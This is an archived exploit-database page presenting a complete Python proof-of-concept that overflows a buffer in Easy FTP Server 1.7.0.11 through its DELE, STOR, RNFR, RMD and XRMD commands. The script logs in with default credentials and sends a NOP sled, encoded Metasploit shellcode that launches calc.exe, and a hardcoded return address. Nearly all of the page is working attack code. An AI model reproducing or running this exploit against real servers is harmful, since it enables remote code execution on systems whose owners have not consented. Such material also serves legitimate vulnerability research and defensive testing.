Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Internet :: 1008-75.htm

Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow



Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow
Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow



# Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow
# Date: August 12, 2010
# Author: Glafkos Charalambous
# Software Link:
http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip 
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
# Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./easyftp.py   "
    print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

buffersize = 268
 

# windows/exec - 227 bytes
# http://www.metasploit.com 
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")

 
eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)
s.recv(1024)
 	
s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send(command +' '+payload+'\r\n')
s.close()


Regards,
Glafkos Charalambous





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH